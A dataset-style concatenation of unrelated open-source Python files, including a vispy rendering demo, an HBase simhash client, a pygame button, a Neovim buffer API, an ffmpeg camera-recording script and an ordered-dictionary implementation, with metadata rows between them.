app.Canvas.__init__(self,
size=(512, 512),
title='scaling quad',
keys='interactive')
# shader program
tet = gloo.Program(vert=vertex, frag=fragment)
# vertices
V = np.array([(0, 0, 0),
(1, 0, 0),
(1.0/2.0, np.sqrt(3.0)/2.0, 0),
(1.0/2.0, np.sqrt(3.0)/6.0, np.sqrt(2.0/3.0))],
dtype=np.float32)
# triangles specified by connecting matrix,
# it can also be initialized using itertools
I = np.array([(0, 1, 2),
(0, 3, 1),
(0, 2, 3),
(1, 3, 2)], dtype=np.uint32)
# edges, used for drawing outline
E = np.array([(0, 1), (1, 2), (2, 0), (1, 3), (2, 3), (0, 3)],
dtype=np.uint32)
# colors of vertices
C = np.array([(1, 0, 0, 1),
(0, 1, 0, 1),
(0, 0, 1, 1),
(1, 1, 0, 1)], dtype=np.float32)
# bind to data
tet['a_position'] = V
tet['a_color'] = C
self.I = gloo.IndexBuffer(I)
self.E = gloo.IndexBuffer(E)
# intialize transformation matrix
view = np.eye(4, dtype=np.float32)
model = np.eye(4, dtype=np.float32)
projection = np.eye(4, dtype=np.float32)
# set view
view = translate((0, 0, -5))
tet['u_model'] = model
tet['u_view'] = view
tet['u_projection'] = projection
# bind your program
self.program = tet
# config and set viewport
gloo.set_viewport(0, 0, *self.physical_size)
gloo.set_clear_color('white')
gloo.set_state('translucent')
gloo.set_polygon_offset(1.0, 1.0)
# bind a timer
self.timer = app.Timer('auto', self.on_timer)
self.theta = 0.0
self.phi = 0.0
self.timer.start()
# show the canvas
self.show()
def on_resize(self, event):
""" canvas resize callback """
ratio = event.physical_size[0] / float(event.physical_size[1])
self.program['u_projection'] = perspective(45.0, ratio, 2.0, 10.0)
gloo.set_viewport(0, 0, *event.physical_size)
def on_draw(self, event):
""" canvas update callback """
gloo.clear()
# Filled cube
gloo.set_state(blend=True, depth_test=False,
polygon_offset_fill=True)
self.program['u_color'] = [1.0, 1.0, 1.0, 0.8]
self.program.draw('triangles', self.I)
# draw outline
gloo.set_state(blend=False, depth_test=False,
polygon_offset_fill=True)
self.program['u_color'] = [0.0, 0.0, 0.0, 1.0]
self.program.draw('lines', self.E)
def on_timer(self, event):
""" canvas time-out callback """
self.theta += .5
self.phi += .5
# note the convention is, theta is applied first and then phi
# see vispy.utils.transforms,
# python is row-major and opengl is column major,
# so the rotate function transposes the output.
model = np.dot(rotate(self.theta, (0, 1, 0)),
rotate(self.phi, (0, 0, 1)))
self.program['u_model'] = model
self.update()
# Finally, we show the canvas and we run the application.
c = Canvas()
app.run()
| apache-2.0 | 7,396,573,617,910,617,000 | 30.524823 | 74 | 0.525309 | false | 3.39313 | false | false | false |
seomoz/simhash-db-py | simhash_db/hbase_client.py | 1 | 3893 | #! /usr/bin/env python
'''Our code to connect to the HBase backend. It uses the happybase
package, which depends on the Thrift service that (for now) is
part of HBase.'''
from gevent import monkey
monkey.patch_all()
import struct
import happybase
import Hbase_thrift
from . import BaseClient
def column_name(integer):
'''Convert an integer to a column name.'''
return 'f%02d:c' % integer
class Client(BaseClient):
'''Our HBase backend client'''
def __init__(self, name, num_blocks, num_bits, *args, **kwargs):
BaseClient.__init__(self, name, num_blocks, num_bits)
# Time to live in seconds
ttl = kwargs.pop('ttl', None)
if ttl is None:
raise ValueError
self.connection = happybase.Connection(**kwargs)
families = {column_name(i): dict(time_to_live=ttl)
for i in range(self.num_tables)}
try:
self.connection.create_table(name, families)
except Hbase_thrift.AlreadyExists:
pass
self.table = self.connection.table(name)
def delete(self):
'''Delete this database of simhashes'''
if self.table is not None:
self.connection.delete_table(self.name, disable=True)
self.table = None
def insert(self, hash_or_hashes):
'''Insert one (or many) hashes into the database'''
if self.table is None:
return
hashes = hash_or_hashes
if not hasattr(hash_or_hashes, '__iter__'):
hashes = [hash_or_hashes]
for hsh in hashes:
for i in range(self.num_tables):
row_key = struct.pack('!Q',
long(self.corpus.tables[i].permute(hsh)))
self.table.put(row_key, {column_name(i): None})
def find_in_table(self, hsh, table_num, ranges):
'''Return all the results found in this particular table'''
low = struct.pack('!Q', ranges[table_num][0])
high = struct.pack('!Q', ranges[table_num][1])
pairs = self.table.scan(row_start=low, row_stop=high,
columns=[column_name(table_num)])
results = [struct.unpack('!Q', k)[0] for k, v in pairs]
results = [self.corpus.tables[table_num].unpermute(d)
for d in results]
return [h for h in results if
self.corpus.distance(h, hsh) <= self.num_bits]
def find_one(self, hash_or_hashes):
'''Find one near-duplicate for the provided query (or queries)'''
if self.table is None:
return None
hashes = hash_or_hashes
if not hasattr(hash_or_hashes, '__iter__'):
hashes = [hash_or_hashes]
results = []
for hsh in hashes:
ranges = self.ranges(hsh)
found = []
for i in range(self.num_tables):
found = self.find_in_table(hsh, i, ranges)
if found:
results.append(found[0])
break
if not found:
results.append(None)
if not hasattr(hash_or_hashes, '__iter__'):
return results[0]
return results
def find_all(self, hash_or_hashes):
'''Find all near-duplicates for the provided query (or queries)'''
if self.table is None:
return None
hashes = hash_or_hashes
if not hasattr(hash_or_hashes, '__iter__'):
hashes = [hash_or_hashes]
results = []
for hsh in hashes:
ranges = self.ranges(hsh)
found = []
for i in range(self.num_tables):
found.extend(self.find_in_table(hsh, i, ranges))
found = list(set(found))
results.append(found)
if not hasattr(hash_or_hashes, '__iter__'):
return results[0]
return results
| mit | 7,742,667,128,239,649,000 | 31.714286 | 79 | 0.553301 | false | 3.936299 | false | false | false |
awes0menessInc/python-projects | Alien-Invasion/button.py | 1 | 1269 | import pygame.font
class Button():
""" A class to create a button. """
def __init__(self, screen, msg):
"""Initialize button attributes."""
self.screen = screen
self.screen_rect = screen.get_rect()
# Set the dimensions and properties of the button.
self.width, self.height = 200, 50
self.button_color = (0, 255, 0)
self.text_color = (255, 255, 255)
self.font = pygame.font.SysFont(None, 48)
# Build the button's rect object and center it.
self.rect = pygame.Rect(0, 0, self.width, self.height)
self.rect.center = self.screen_rect.center
# The button message needs to be prepped only once.
self.prep_msg(msg)
def prep_msg(self, msg):
"""Turn msg into a rendered image and center text on the button."""
self.msg_image = self.font.render(msg, True, self.text_color,
self.button_color)
self.msg_image_rect = self.msg_image.get_rect()
self.msg_image_rect.center = self.rect.center
def draw_button(self):
# Draw blank button and then draw message.
self.screen.fill(self.button_color, self.rect)
self.screen.blit(self.msg_image, self.msg_image_rect)
| mit | 4,828,632,466,260,825,000 | 35.257143 | 75 | 0.602049 | false | 3.754438 | false | false | false |
msfrank/mandelbrot | mandelbrot/registry.py | 1 | 3001 | # Copyright 2015 Michael Frank <[email protected]>
#
# This file is part of Mandelbrot.
#
# Mandelbrot is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Mandelbrot is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Mandelbrot. If not, see <http://www.gnu.org/licenses/>.
import pkg_resources
import logging
log = logging.getLogger("mandelbrot.registry")
from mandelbrot import versionstring
require_mandelbrot = 'mandelbrot == ' + versionstring()
class Registry(object):
"""
"""
def __init__(self):
self.env = pkg_resources.Environment([])
plugins,errors = pkg_resources.working_set.find_plugins(self.env)
for plugin in plugins:
pkg_resources.working_set.add(plugin)
for error in errors:
log.info("failed to load distribution: %s", error)
self.overrides = {}
def override_factory(self, entry_point_type, factory_name, factory):
"""
:param entry_point_type:
:type entry_point_type: str
:param factory_name:
:type factory_name: str
:param factory:
:type factory: type
"""
self.overrides[(entry_point_type,factory_name)] = factory
def lookup_factory(self, entry_point_type, factory_name, factory_type, requirement=require_mandelbrot):
"""
:param entry_point_type:
:type entry_point_type: str
:param factory_name:
:type factory_name: str
:param factory_type:
:type factory_type: type
:param requirement:
:type requirement: str
"""
log.debug("looking up '%s' of type %s with requirement %s", factory_name,
entry_point_type, requirement)
# check factory overrides first
if (entry_point_type,factory_name) in self.overrides:
factory = self.overrides[(entry_point_type,factory_name)]
# find the entrypoint matching the specified requirement
else:
requirement = pkg_resources.Requirement.parse(requirement)
distribution = pkg_resources.working_set.find(requirement)
factory = distribution.load_entry_point(entry_point_type, factory_name)
log.debug("loaded factory %s.%s", factory.__module__, factory.__class__.__name__)
# verify that the factory is the correct type
if not issubclass(factory, factory_type):
raise TypeError("{}.{} is not a subclass of {}".format(
factory.__module__, factory.__class__.__name__, factory_type.__name__))
return factory
| gpl-3.0 | -5,360,309,663,945,176,000 | 39.013333 | 107 | 0.654782 | false | 4.088556 | false | false | false |
lunixbochs/actualvim | lib/neovim/api/buffer.py | 1 | 6063 | """API for working with a Nvim Buffer."""
from .common import Remote
from ..compat import IS_PYTHON3
__all__ = ('Buffer')
if IS_PYTHON3:
basestring = str
def adjust_index(idx, default=None):
"""Convert from python indexing convention to nvim indexing convention."""
if idx is None:
return default
elif idx < 0:
return idx - 1
else:
return idx
class Buffer(Remote):
"""A remote Nvim buffer."""
_api_prefix = "nvim_buf_"
def __len__(self):
"""Return the number of lines contained in a Buffer."""
return self.request('buffer_line_count')
def _get_lines(self, start, end, strict):
lines = self.request_raw('nvim_buf_get_lines', start, end, strict)
return [line.decode('utf8') for line in lines]
def _set_lines(self, start, end, strict, lines):
lines = [line.encode('utf8') for line in lines]
return self.request_raw('nvim_buf_set_lines', start, end, strict, lines)
def __getitem__(self, idx):
"""Get a buffer line or slice by integer index.
Indexes may be negative to specify positions from the end of the
buffer. For example, -1 is the last line, -2 is the line before that
and so on.
When retrieving slices, omiting indexes(eg: `buffer[:]`) will bring
the whole buffer.
"""
if not isinstance(idx, slice):
i = adjust_index(idx)
return self._get_lines(i, i + 1, True)[0]
start = adjust_index(idx.start, 0)
end = adjust_index(idx.stop, -1)
return self._get_lines(start, end, False)
def __setitem__(self, idx, item):
"""Replace a buffer line or slice by integer index.
Like with `__getitem__`, indexes may be negative.
When replacing slices, omiting indexes(eg: `buffer[:]`) will replace
the whole buffer.
"""
if not isinstance(idx, slice):
i = adjust_index(idx)
lines = [item] if item is not None else []
return self._set_lines(i, i + 1, True, lines)
lines = item if item is not None else []
start = adjust_index(idx.start, 0)
end = adjust_index(idx.stop, -1)
return self._set_lines(start, end, False, lines)
def __iter__(self):
"""Iterate lines of a buffer.
This will retrieve all lines locally before iteration starts. This
approach is used because for most cases, the gain is much greater by
minimizing the number of API calls by transfering all data needed to
work.
"""
lines = self[:]
for line in lines:
yield line
def __delitem__(self, idx):
"""Delete line or slice of lines from the buffer.
This is the same as __setitem__(idx, [])
"""
self.__setitem__(idx, None)
def append(self, lines, index=-1):
"""Append a string or list of lines to the buffer."""
if isinstance(lines, (basestring, bytes)):
lines = [lines]
return self._set_lines(index, index, True, lines)
def mark(self, name):
"""Return (row, col) tuple for a named mark."""
return self.request('nvim_buf_get_mark', name)
def range(self, start, end):
"""Return a `Range` object, which represents part of the Buffer."""
return Range(self, start, end)
def add_highlight(self, hl_group, line, col_start=0,
col_end=-1, src_id=-1, async=None):
"""Add a highlight to the buffer."""
if async is None:
async = (src_id != 0)
return self.request('nvim_buf_add_highlight', src_id, hl_group,
line, col_start, col_end, async=async)
def clear_highlight(self, src_id, line_start=0, line_end=-1, async=True):
"""Clear highlights from the buffer."""
self.request('nvim_buf_clear_highlight', src_id,
line_start, line_end, async=async)
@property
def name(self):
"""Get the buffer name."""
return self.request('nvim_buf_get_name')
@name.setter
def name(self, value):
"""Set the buffer name. BufFilePre/BufFilePost are triggered."""
return self.request('nvim_buf_set_name', value)
@property
def valid(self):
"""Return True if the buffer still exists."""
return self.request('nvim_buf_is_valid')
@property
def number(self):
"""Get the buffer number."""
return self.handle
class Range(object):
def __init__(self, buffer, start, end):
self._buffer = buffer
self.start = start - 1
self.end = end - 1
def __len__(self):
return self.end - self.start + 1
def __getitem__(self, idx):
if not isinstance(idx, slice):
return self._buffer[self._normalize_index(idx)]
start = self._normalize_index(idx.start)
end = self._normalize_index(idx.stop)
if start is None:
start = self.start
if end is None:
end = self.end + 1
return self._buffer[start:end]
def __setitem__(self, idx, lines):
if not isinstance(idx, slice):
self._buffer[self._normalize_index(idx)] = lines
return
start = self._normalize_index(idx.start)
end = self._normalize_index(idx.stop)
if start is None:
start = self.start
if end is None:
end = self.end + 1
self._buffer[start:end] = lines
def __iter__(self):
for i in range(self.start, self.end + 1):
yield self._buffer[i]
def append(self, lines, i=None):
i = self._normalize_index(i)
if i is None:
i = self.end + 1
self._buffer.append(lines, i)
def _normalize_index(self, index):
if index is None:
return None
if index < 0:
index = self.end
else:
index += self.start
if index > self.end:
index = self.end
return index
| mit | 3,638,414,735,793,391,600 | 30.414508 | 80 | 0.568036 | false | 3.937013 | false | false | false |
mikehankey/fireball_camera | ffmpeg_record.py | 1 | 2859 | #!/usr/bin/python3
import glob
import sys
import subprocess
import os
import time
video_dir = "/mnt/ams2"
def check_running(cam_num, type):
if type == "HD":
cmd = "ps -aux |grep \"ffmpeg\" | grep \"HD\" | grep \"cam" + cam_num + "\" | grep -v grep | wc -l"
else:
cmd = "ps -aux |grep \"ffmpeg\" | grep \"SD\" | grep \"cam" + cam_num + "\" | grep -v grep | wc -l"
print(cmd)
output = subprocess.check_output(cmd, shell=True).decode("utf-8")
output = int(output.replace("\n", ""))
return(int(output))
def start_capture(cam_num):
running = check_running(cam_num, "HD")
if running == 0:
cmd = "/usr/bin/ffmpeg -i rtsp://192.168.76.7" + cam_num + "/av0_0 -c copy -map 0 -f segment -strftime 1 -segment_time 60 -segment_format mp4 \"" + video_dir + "/HD/" + "%Y-%m-%d_%H-%M-%S-cam" + cam_num + ".mp4\" 2>&1 > /dev/null & "
print(cmd)
os.system(cmd)
time.sleep(2)
else:
print ("ffmpeg already running for cam:", cam_num)
running = check_running(cam_num, "SD")
if running == 0:
cmd = "/usr/bin/ffmpeg -i rtsp://192.168.76.7" + cam_num + "/av0_1 -c copy -map 0 -f segment -strftime 1 -segment_time 60 -segment_format mp4 \"" + video_dir + "/SD/" + "%Y-%m-%d_%H-%M-%S-cam" + cam_num + ".mp4\" 2>&1 > /dev/null & "
print(cmd)
os.system(cmd)
time.sleep(2)
else:
print ("ffmpeg already running for cam:", cam_num)
def stop_capture(cam_num):
#print ("Stopping capture for ", cam_num)
cmd = "kill -9 `ps -aux | grep ffmpeg |grep -v grep| awk '{print $2}'`"
output = subprocess.check_output(cmd, shell=True).decode("utf-8")
print (output)
def purge(cam_num):
cur_time = int(time.time())
#cmd = "rm " + cam_num + "/*"
#print (cmd)
#os.system(cmd)
for filename in (glob.glob(video_dir + '/' + cam_num + '/*.mp4')):
st = os.stat(filename)
mtime = st.st_mtime
tdiff = cur_time - mtime
tdiff = tdiff / 60 / 60 / 24
if tdiff >= .8:
cmd = "rm " + filename
print(cmd)
os.system(cmd)
#file_list.append(filename)
try:
cmd = sys.argv[1]
cam_num = sys.argv[2]
except:
do_all = 1
if (cmd == "stop"):
stop_capture("1")
if (cmd == "start"):
start_capture(cam_num)
if (cmd == "start_all"):
start_capture("1")
start_capture("2")
start_capture("3")
start_capture("4")
start_capture("5")
start_capture("6")
if (cmd == "purge"):
purge(cam_num)
if (cmd == "check_running"):
running = check_running(cam_num, "HD")
print (running)
running = check_running(cam_num, "SD")
print (running)
if (cmd == "purge_all"):
purge("1")
purge("2")
purge("3")
purge("4")
purge("5")
purge("6")
#ffmpeg -i rtsp://192.168.76.71/av0_1 -c copy -map 0 -f segment -segment_time 60 -segment_format mp4 "1/capture-1-%03d.mp4" &
| gpl-3.0 | 4,738,862,852,939,186,000 | 25.971698 | 239 | 0.564533 | false | 2.841948 | false | false | false |
release-engineering/fedmsg_meta_umb | fedmsg_meta_umb/rpmdiff.py | 1 | 2379 | # Copyright (C) 2017 Red Hat, Inc.
#
# fedmsg_meta_umb is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# fedmsg_meta_umb is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with fedmsg; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
# Authors: Ralph Bean <[email protected]>
from fedmsg.meta.base import BaseProcessor
class RPMDiffProcessor(BaseProcessor):
topic_prefix_re = r'/topic/VirtualTopic\.eng'
__name__ = 'rpmdiff'
__description__ = 'the rpmdiff analysis system'
__link__ = 'https://rpmdiff.engineering.redhat.com/'
__docs__ = 'https://docs.engineering.redhat.com/display/EXD/rpmdiff'
__obj__ = 'RPMDiff Analysis System'
__icon__ = '_static/img/icons/erratatool50.png'
def title(self, msg, **config):
return msg['topic'].split('.', 2)[-1]
def subtitle(self, msg, **config):
action = self.title(msg, **config).split('.')[-1]
if msg['msg']['type'] == 'COMPARISON':
kwargs = dict(
action=action,
package=msg['msg']['package_name'],
baseline='-'.join(msg['msg']['baseline'].rsplit('-', 2)[1:]),
target='-'.join(msg['msg']['nvr'].rsplit('-', 2)[1:]),
)
template = ('rpmdiff comparison of {package} is {action} '
'({target} against {baseline})')
return template.format(**kwargs)
elif msg['msg']['type'] == 'ANALYSIS':
kwargs = dict(action=action, nvr=msg['msg']['nvr'])
template = 'rpmdiff analysis of {nvr} is {action}'
return template.format(**kwargs)
def packages(self, msg, **config):
return set([msg['msg']['package_name']])
def link(self, msg, **config):
template = 'https://rpmdiff.engineering.redhat.com/run/{run_id}/'
return template.format(**msg['msg'])
| lgpl-2.1 | 5,623,728,822,967,871,000 | 40.736842 | 78 | 0.623792 | false | 3.800319 | false | false | false |
jesuscript/topo-mpi | param/external.py | 1 | 68357 | """
External code required for param/tkinter interface.
* odict: an ordered dictionary
* tilewrapper: a wrapper for Tile/ttk widgets
Note that an ordered dictionary and a wrapper for ttk widgets are both
available in Python 2.7.
"""
from __future__ import generators
# odict.py
# An Ordered Dictionary object
# Copyright (C) 2005 Nicola Larosa, Michael Foord
# E-mail: nico AT tekNico DOT net, fuzzyman AT voidspace DOT org DOT uk
# This software is licensed under the terms of the BSD license.
# http://www.voidspace.org.uk/python/license.shtml
# Basically you're free to copy, modify, distribute and relicense it,
# So long as you keep a copy of the license with it.
# Documentation at http://www.voidspace.org.uk/python/odict.html
# For information about bugfixes, updates and support, please join the
# Pythonutils mailing list:
# http://groups.google.com/group/pythonutils/
# Comments, suggestions and bug reports welcome.
"""A dict that keeps keys in insertion order"""
__author__ = ('Nicola Larosa <[email protected]>,'
'Michael Foord <fuzzyman AT voidspace DOT org DOT uk>')
__docformat__ = "restructuredtext en"
__revision__ = '$Id$'
__version__ = '0.2.2'
__all__ = ['OrderedDict', 'SequenceOrderedDict']
import sys
INTP_VER = sys.version_info[:2]
if INTP_VER < (2, 2):
raise RuntimeError("Python v.2.2 or later required")
import types, warnings
class OrderedDict(dict):
"""
A class of dictionary that keeps the insertion order of keys.
All appropriate methods return keys, items, or values in an ordered way.
All normal dictionary methods are available. Update and comparison is
restricted to other OrderedDict objects.
Various sequence methods are available, including the ability to explicitly
mutate the key ordering.
__contains__ tests:
>>> d = OrderedDict(((1, 3),))
>>> 1 in d
1
>>> 4 in d
0
__getitem__ tests:
>>> OrderedDict(((1, 3), (3, 2), (2, 1)))[2]
1
>>> OrderedDict(((1, 3), (3, 2), (2, 1)))[4]
Traceback (most recent call last):
KeyError: 4
__len__ tests:
>>> len(OrderedDict())
0
>>> len(OrderedDict(((1, 3), (3, 2), (2, 1))))
3
get tests:
>>> d = OrderedDict(((1, 3), (3, 2), (2, 1)))
>>> d.get(1)
3
>>> d.get(4) is None
1
>>> d.get(4, 5)
5
>>> d
OrderedDict([(1, 3), (3, 2), (2, 1)])
has_key tests:
>>> d = OrderedDict(((1, 3), (3, 2), (2, 1)))
>>> d.has_key(1)
1
>>> d.has_key(4)
0
"""
def __init__(self, init_val=(), strict=False):
"""
Create a new ordered dictionary. Cannot init from a normal dict,
nor from kwargs, since items order is undefined in those cases.
If the ``strict`` keyword argument is ``True`` (``False`` is the
default) then when doing slice assignment - the ``OrderedDict`` you are
assigning from *must not* contain any keys in the remaining dict.
>>> OrderedDict()
OrderedDict([])
>>> OrderedDict({1: 1})
Traceback (most recent call last):
TypeError: undefined order, cannot get items from dict
>>> OrderedDict({1: 1}.items())
OrderedDict([(1, 1)])
>>> d = OrderedDict(((1, 3), (3, 2), (2, 1)))
>>> d
OrderedDict([(1, 3), (3, 2), (2, 1)])
>>> OrderedDict(d)
OrderedDict([(1, 3), (3, 2), (2, 1)])
"""
self.strict = strict
dict.__init__(self)
if isinstance(init_val, OrderedDict):
self._sequence = init_val.keys()
dict.update(self, init_val)
elif isinstance(init_val, dict):
# we lose compatibility with other ordered dict types this way
raise TypeError('undefined order, cannot get items from dict')
else:
self._sequence = []
self.update(init_val)
### Special methods ###
def __delitem__(self, key):
"""
>>> d = OrderedDict(((1, 3), (3, 2), (2, 1)))
>>> del d[3]
>>> d
OrderedDict([(1, 3), (2, 1)])
>>> del d[3]
Traceback (most recent call last):
KeyError: 3
>>> d[3] = 2
>>> d
OrderedDict([(1, 3), (2, 1), (3, 2)])
>>> del d[0:1]
>>> d
OrderedDict([(2, 1), (3, 2)])
"""
if isinstance(key, types.SliceType):
# FIXME: efficiency?
keys = self._sequence[key]
for entry in keys:
dict.__delitem__(self, entry)
del self._sequence[key]
else:
# do the dict.__delitem__ *first* as it raises
# the more appropriate error
dict.__delitem__(self, key)
self._sequence.remove(key)
def __eq__(self, other):
"""
>>> d = OrderedDict(((1, 3), (3, 2), (2, 1)))
>>> d == OrderedDict(d)
True
>>> d == OrderedDict(((1, 3), (2, 1), (3, 2)))
False
>>> d == OrderedDict(((1, 0), (3, 2), (2, 1)))
False
>>> d == OrderedDict(((0, 3), (3, 2), (2, 1)))
False
>>> d == dict(d)
False
>>> d == False
False
"""
if isinstance(other, OrderedDict):
# FIXME: efficiency?
# Generate both item lists for each compare
return (self.items() == other.items())
else:
return False
def __lt__(self, other):
"""
>>> d = OrderedDict(((1, 3), (3, 2), (2, 1)))
>>> c = OrderedDict(((0, 3), (3, 2), (2, 1)))
>>> c < d
True
>>> d < c
False
>>> d < dict(c)
Traceback (most recent call last):
TypeError: Can only compare with other OrderedDicts
"""
if not isinstance(other, OrderedDict):
raise TypeError('Can only compare with other OrderedDicts')
# FIXME: efficiency?
# Generate both item lists for each compare
return (self.items() < other.items())
def __le__(self, other):
"""
>>> d = OrderedDict(((1, 3), (3, 2), (2, 1)))
>>> c = OrderedDict(((0, 3), (3, 2), (2, 1)))
>>> e = OrderedDict(d)
>>> c <= d
True
>>> d <= c
False
>>> d <= dict(c)
Traceback (most recent call last):
TypeError: Can only compare with other OrderedDicts
>>> d <= e
True
"""
if not isinstance(other, OrderedDict):
raise TypeError('Can only compare with other OrderedDicts')
# FIXME: efficiency?
# Generate both item lists for each compare
return (self.items() <= other.items())
def __ne__(self, other):
"""
>>> d = OrderedDict(((1, 3), (3, 2), (2, 1)))
>>> d != OrderedDict(d)
False
>>> d != OrderedDict(((1, 3), (2, 1), (3, 2)))
True
>>> d != OrderedDict(((1, 0), (3, 2), (2, 1)))
True
>>> d == OrderedDict(((0, 3), (3, 2), (2, 1)))
False
>>> d != dict(d)
True
>>> d != False
True
"""
if isinstance(other, OrderedDict):
# FIXME: efficiency?
# Generate both item lists for each compare
return not (self.items() == other.items())
else:
return True
def __gt__(self, other):
"""
>>> d = OrderedDict(((1, 3), (3, 2), (2, 1)))
>>> c = OrderedDict(((0, 3), (3, 2), (2, 1)))
>>> d > c
True
>>> c > d
False
>>> d > dict(c)
Traceback (most recent call last):
TypeError: Can only compare with other OrderedDicts
"""
if not isinstance(other, OrderedDict):
raise TypeError('Can only compare with other OrderedDicts')
# FIXME: efficiency?
# Generate both item lists for each compare
return (self.items() > other.items())
def __ge__(self, other):
"""
>>> d = OrderedDict(((1, 3), (3, 2), (2, 1)))
>>> c = OrderedDict(((0, 3), (3, 2), (2, 1)))
>>> e = OrderedDict(d)
>>> c >= d
False
>>> d >= c
True
>>> d >= dict(c)
Traceback (most recent call last):
TypeError: Can only compare with other OrderedDicts
>>> e >= d
True
"""
if not isinstance(other, OrderedDict):
raise TypeError('Can only compare with other OrderedDicts')
# FIXME: efficiency?
# Generate both item lists for each compare
return (self.items() >= other.items())
def __repr__(self):
"""
Used for __repr__ and __str__
>>> r1 = repr(OrderedDict((('a', 'b'), ('c', 'd'), ('e', 'f'))))
>>> r1
"OrderedDict([('a', 'b'), ('c', 'd'), ('e', 'f')])"
>>> r2 = repr(OrderedDict((('a', 'b'), ('e', 'f'), ('c', 'd'))))
>>> r2
"OrderedDict([('a', 'b'), ('e', 'f'), ('c', 'd')])"
>>> r1 == str(OrderedDict((('a', 'b'), ('c', 'd'), ('e', 'f'))))
True
>>> r2 == str(OrderedDict((('a', 'b'), ('e', 'f'), ('c', 'd'))))
True
"""
return '%s([%s])' % (self.__class__.__name__, ', '.join(
['(%r, %r)' % (key, self[key]) for key in self._sequence]))
def __setitem__(self, key, val):
"""
Allows slice assignment, so long as the slice is an OrderedDict
>>> d = OrderedDict()
>>> d['a'] = 'b'
>>> d['b'] = 'a'
>>> d[3] = 12
>>> d
OrderedDict([('a', 'b'), ('b', 'a'), (3, 12)])
>>> d[:] = OrderedDict(((1, 2), (2, 3), (3, 4)))
>>> d
OrderedDict([(1, 2), (2, 3), (3, 4)])
>>> d[::2] = OrderedDict(((7, 8), (9, 10)))
>>> d
OrderedDict([(7, 8), (2, 3), (9, 10)])
>>> d = OrderedDict(((0, 1), (1, 2), (2, 3), (3, 4)))
>>> d[1:3] = OrderedDict(((1, 2), (5, 6), (7, 8)))
>>> d
OrderedDict([(0, 1), (1, 2), (5, 6), (7, 8), (3, 4)])
>>> d = OrderedDict(((0, 1), (1, 2), (2, 3), (3, 4)), strict=True)
>>> d[1:3] = OrderedDict(((1, 2), (5, 6), (7, 8)))
>>> d
OrderedDict([(0, 1), (1, 2), (5, 6), (7, 8), (3, 4)])
>>> a = OrderedDict(((0, 1), (1, 2), (2, 3)), strict=True)
>>> a[3] = 4
>>> a
OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4)])
>>> a[::1] = OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4)])
>>> a
OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4)])
>>> a[:2] = OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4), (4, 5)])
Traceback (most recent call last):
ValueError: slice assignment must be from unique keys
>>> a = OrderedDict(((0, 1), (1, 2), (2, 3)))
>>> a[3] = 4
>>> a
OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4)])
>>> a[::1] = OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4)])
>>> a
OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4)])
>>> a[:2] = OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4)])
>>> a
OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4)])
>>> a[::-1] = OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4)])
>>> a
OrderedDict([(3, 4), (2, 3), (1, 2), (0, 1)])
>>> d = OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4)])
>>> d[:1] = 3
Traceback (most recent call last):
TypeError: slice assignment requires an OrderedDict
>>> d = OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4)])
>>> d[:1] = OrderedDict([(9, 8)])
>>> d
OrderedDict([(9, 8), (1, 2), (2, 3), (3, 4)])
"""
if isinstance(key, types.SliceType):
if not isinstance(val, OrderedDict):
# FIXME: allow a list of tuples?
raise TypeError('slice assignment requires an OrderedDict')
keys = self._sequence[key]
# NOTE: Could use ``range(*key.indices(len(self._sequence)))``
indexes = range(len(self._sequence))[key]
if key.step is None:
# NOTE: new slice may not be the same size as the one being
# overwritten !
# NOTE: What is the algorithm for an impossible slice?
# e.g. d[5:3]
pos = key.start or 0
del self[key]
newkeys = val.keys()
for k in newkeys:
if k in self:
if self.strict:
raise ValueError('slice assignment must be from '
'unique keys')
else:
# NOTE: This removes duplicate keys *first*
# so start position might have changed?
del self[k]
self._sequence = (self._sequence[:pos] + newkeys +
self._sequence[pos:])
dict.update(self, val)
else:
# extended slice - length of new slice must be the same
# as the one being replaced
if len(keys) != len(val):
raise ValueError('attempt to assign sequence of size %s '
'to extended slice of size %s' % (len(val), len(keys)))
# FIXME: efficiency?
del self[key]
item_list = zip(indexes, val.items())
# smallest indexes first - higher indexes not guaranteed to
# exist
item_list.sort()
for pos, (newkey, newval) in item_list:
if self.strict and newkey in self:
raise ValueError('slice assignment must be from unique'
' keys')
self.insert(pos, newkey, newval)
else:
if key not in self:
self._sequence.append(key)
dict.__setitem__(self, key, val)
def __getitem__(self, key):
"""
Allows slicing. Returns an OrderedDict if you slice.
>>> b = OrderedDict([(7, 0), (6, 1), (5, 2), (4, 3), (3, 4), (2, 5), (1, 6)])
>>> b[::-1]
OrderedDict([(1, 6), (2, 5), (3, 4), (4, 3), (5, 2), (6, 1), (7, 0)])
>>> b[2:5]
OrderedDict([(5, 2), (4, 3), (3, 4)])
>>> type(b[2:4])
<class '__main__.OrderedDict'>
"""
if isinstance(key, types.SliceType):
# FIXME: does this raise the error we want?
keys = self._sequence[key]
# FIXME: efficiency?
return OrderedDict([(entry, self[entry]) for entry in keys])
else:
return dict.__getitem__(self, key)
__str__ = __repr__
def __setattr__(self, name, value):
"""
Implemented so that accesses to ``sequence`` raise a warning and are
diverted to the new ``setkeys`` method.
"""
if name == 'sequence':
warnings.warn('Use of the sequence attribute is deprecated.'
' Use the keys method instead.', DeprecationWarning)
